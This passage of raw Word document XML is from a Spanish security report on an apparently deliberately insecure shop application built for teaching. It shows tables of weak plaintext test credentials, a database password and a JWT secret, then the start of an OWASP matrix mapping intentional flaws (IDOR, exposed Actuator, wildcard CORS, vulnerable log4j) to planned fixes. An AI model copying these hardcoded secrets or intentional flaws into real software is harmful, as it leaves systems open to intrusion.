                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="15"/>
                    </w:rPr>
                    <w:t>Usuario</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="20385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</w:tcPr>
                <w:p w14:paraId="7ED0229B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="15"/>
                    </w:rPr>
                    <w:t>Password</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="20385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</w:tcPr>
                <w:p w14:paraId="11CC82E8" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="15"/>
                    </w:rPr>
                    <w:t>Rol</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00217A21" w14:paraId="2F8BEEEC" w14:textId="77777777">
              <w:trPr>
                <w:cantSplit/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa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B33AA6C" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>admin</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa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81DDAAA" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>admin123</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa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C5A4EBF" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>ADMIN</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00217A21" w14:paraId="2075508B" w14:textId="77777777">
              <w:trPr>
                <w:cantSplit/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA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6599F30" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>jperez</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA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73CCAE7" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>password1</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA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240F149" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>USER</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00217A21" w14:paraId="349A163B" w14:textId="77777777">
              <w:trPr>
                <w:cantSplit/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa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F9FA1DD" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>mgarcia</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa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A116C0F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>qwerty123</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa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96B4DF2" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>USER</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="16539CB1" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="453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0AF022D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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20385F"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Servicios y secretos</w:t>
            </w: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512"/>
              <w:gridCol w:w="1512"/>
              <w:gridCol w:w="1512"/>
            </w:tblGrid>
            <w:tr w:rsidR="00217A21" w14:paraId="420FD003" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="20385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</w:tcPr>
                <w:p w14:paraId="74F343F3" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="15"/>
                    </w:rPr>
                    <w:t>Componente</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="20385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</w:tcPr>
                <w:p w14:paraId="3382A5AF" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="15"/>
                    </w:rPr>
                    <w:t>Valor</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="20385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</w:tcPr>
                <w:p w14:paraId="361AED56" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="15"/>
                    </w:rPr>
                    <w:t>Secreto</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00217A21" w14:paraId="1AA063F5" w14:textId="77777777">
              <w:trPr>
                <w:cantSplit/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa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3ABDFC6" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>PostgreSQL</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa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3B4A338" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>tienda_user</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa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3E67196" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>tienda_pass_123</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00217A21" w14:paraId="198A6A03" w14:textId="77777777">
              <w:trPr>
                <w:cantSplit/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA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6276707" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>Base de datos</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA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0A833CA" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>tienda_insegura</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA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FD7815B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>-</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00217A21" w14:paraId="6DE6ECB2" w14:textId="77777777">
              <w:trPr>
                <w:cantSplit/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa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E11ADE2" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>JWT</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa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748AB2B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>app.jwt.secret</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa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9DB5208" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                    <w:t>clave-super-secreta-insegura-2025</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="4F13692A" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D3C509E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DED62A3" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EDEB9E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9. Matriz de vulnerabilidades y trazabilidad OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2074F586" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">La siguiente matriz relaciona cada categoría con la implementación, la evidencia esperada y la corrección prevista. </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Algunas fallas se superponen entre categorías; por ejemplo, un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>stacktrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> también puede considerarse una configuración insegura. En este informe se clasifica principalmente por la causa técnica que se desea demostrar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FBE986" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Nota de clasificación A08: la carga in</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">segura se presenta como confianza indebida en datos y metadatos controlados por el cliente; también se relaciona secundariamente con A01 por </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>traversal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y con A06 por el diseño inseguro del flujo.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1474"/>
        <w:gridCol w:w="1984"/>
        <w:gridCol w:w="1928"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1757"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="270BFC0B" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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3A9D55" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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w="1474" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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B2B60B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Categoría</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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FEC10E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Implementación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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40EFB4" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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38C061" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Evidencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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929F9" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Corrección V2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="3DE94967" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56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0E985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2"/>
              </w:rPr>
              <w:t>A01</w:t>
            </w:r>
          </w:p>
        </w:tc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9B5DA6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2"/>
              </w:rPr>
              <w:t>Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc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6463F9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2"/>
              </w:rPr>
              <w:t>role=ADMIN; admin sin rol; IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc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C29E9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2"/>
              </w:rPr>
              <w:t>AuthService / AdminController / OrderController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C0C368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sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Acceso </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> o pedido ajeno</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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155EF9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2"/>
              </w:rPr>
              <w:t xml:space="preserve">Roles y </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="12"/>
              </w:rPr>
              <w:t>propietario</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="463ED275" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567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B1D12E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2"/>
              </w:rPr>
              <w:t>A02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474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B2A69A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2"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984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AE5A6E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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Actuator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> *, CORS *, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>debug</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> y secretos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928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D00ACB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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="12"/>
              </w:rPr>
              <w:t>application.properties</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="12"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="12"/>
              </w:rPr>
              <w:t>WebConfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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3B0FF8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2"/>
              </w:rPr>
              <w:t>env y CORS visibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757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0919B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sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Perfiles, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>whitelist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> y </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Actuator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> limitado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="5ED8A8A1" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56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1CA299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2"/>
              </w:rPr>
              <w:t>A03</w:t>
            </w:r>
          </w:p>
        </w:tc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96CE74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2"/>
              </w:rPr>
              <w:t>Supply Chain Failures</w:t>
            </w:r>
          </w:p>
        </w:tc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7B102F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2"/>
              </w:rPr>
              <w:t>log4j-core 2.14.1</w:t>
            </w:r>
          </w:p>
        </w:tc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289EF5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2"/>
              </w:rPr>
              <w:t>pom.xml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670C93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2"/>
              </w:rPr>
              <w:t>CVE en Dependency-Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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5A28B6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2"/>
              </w:rPr>
              <w:t>Actualizar y SCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="5897A3CF" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567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A1283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2"/>
              </w:rPr>
              <w:t>A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474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350641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2"/>
              </w:rPr>
              <w:t>Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984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3DBD35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2"/>
              </w:rPr>
              <w:t>Passwords planos; JWT débil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928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909309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2"/>
              </w:rPr>
              <w:t xml:space="preserve">User / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="12"/>
              </w:rPr>
              <w:t>AuthService / data.sql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
